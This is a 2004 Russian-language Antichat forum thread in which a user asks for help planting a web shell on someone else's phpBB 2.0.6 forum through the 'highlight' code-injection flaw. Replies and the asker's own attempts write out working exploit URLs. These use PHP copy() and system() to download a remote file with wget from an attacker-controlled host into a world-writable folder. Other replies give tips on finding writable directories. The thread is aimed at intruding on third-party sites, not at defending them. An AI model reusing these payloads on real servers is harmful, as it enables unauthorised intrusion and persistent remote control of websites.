Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Вопрос по заливке шелла, используя уязвимость highlight в форуме phpBB 2.0.6 |
27.12.2004, 20:21
|
|
Новичок
Регистрация: 27.12.2004
Сообщений: 7
Провел на форуме:
11532
Репутация:
0
|
|
Вопрос по заливке шелла, используя уязвимость highlight в форуме phpBB 2.0.6
какая команда на запись в другую папку.(отличную от корневой напр. "forum)"
расcказываю как есть...
на одном форуме есть папка доступная к записыванию эта папка называется db
ВОПРОС:
как залить туда шелл, использую эту уязвимость
viewtopic.php?a=http://твой_ремотер&b=твоё_имя_файл а&t=1&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527
- как я понимаю эта команда для записи в корневую папку.
форум phpBB 2.0.6
Уважаемые, только не молчите. |
|
|
27.12.2004, 22:27
|
|
Новичок
Регистрация: 07.12.2004
Сообщений: 27
Провел на форуме:
0
Репутация:
0
|
|
Для начала зделай cd <путь>, а вот потом уж заливай!
Что-то типа:
viewtopic.php?xxx=cd <путь>;wget <адрес твоего ремоута>&t=1&highlight=%2527.system($_GET[xxx]).include%2527
|
|
|
|
27.12.2004, 23:49
|
|
Новичок
Регистрация: 27.12.2004
Сообщений: 7
Провел на форуме:
11532
Репутация:
0
|
|
нет, illusion
что-то не подходит, мне кажется ты не втом порядке записал.
|
|
|
|
28.12.2004, 18:16
|
|
Новичок
Регистрация: 27.12.2004
Сообщений: 7
Провел на форуме:
11532
Репутация:
0
|
|
хм...так что же это получается, если сам форум не разрешен на запись, значит и не в какую другую папку и не записпть, если она доступна для записи ?
|
|
|
|
28.12.2004, 20:04
|
|
Administrator
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме:
20377164
Репутация:
0
|
|
Сообщение от vega2k
хм...так что же это получается, если сам форум не разрешен на запись, значит и не в какую другую папку и не записпть, если она доступна для записи ?
нет не так.. ищи папку в которую запись разрешена.. или хотя бы файл в который можно писать...
|
|
|
|
28.12.2004, 21:08
|
|
Новичок
Регистрация: 27.12.2004
Сообщений: 7
Провел на форуме:
11532
Репутация:
0
|
|
admin drwxr-xr-x
cache drwxr-xr-x
db drwxrwxrwx
docs drwxr-xr-x
images drwxr-xr-x
includes drwxr-xr-x
language drwxr-xr-x
templates drwxr-xr-x
common.php -rw-r--r--
config.php -rwxrwxrwx
пишу,
viewtopic.php?a=http://www.hot.ee/vega2k/1.hp&b=&b=/db/dhelp.php&t=44&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527
и ни чего не выходит, не записывается.
а вот на другом форуме, где есть доступ на запись в саму папку форума, я могу и вдругие папки записывать, которые находяться не в папке форума а чуть выше (по дереву)
Последний раз редактировалось vega2k; 28.12.2004 в 21:11..
|
|
|
|
29.12.2004, 12:30
|
|
Новичок
Регистрация: 22.12.2004
Сообщений: 18
Провел на форуме:
0
Репутация:
0
|
|
А какой командой можно посмтатреть какие папки открыты на запись???
|
|
|
|
29.12.2004, 12:43
|
|
Administrator
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме:
20377164
Репутация:
0
|
|
vega2k так может та команда что ты пишешь не работает просто на сервере?
|
|
|
|
29.12.2004, 14:44
|
|
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719
Репутация:
1384
|
|
2onyx3 Вот этой ls -l
__________________
http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
|
|
|
|
29.12.2004, 17:30
|
|
Новичок
Регистрация: 27.12.2004
Сообщений: 7
Провел на форуме:
11532
Репутация:
0
|
|
Егорыч+++, хех, возможно...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
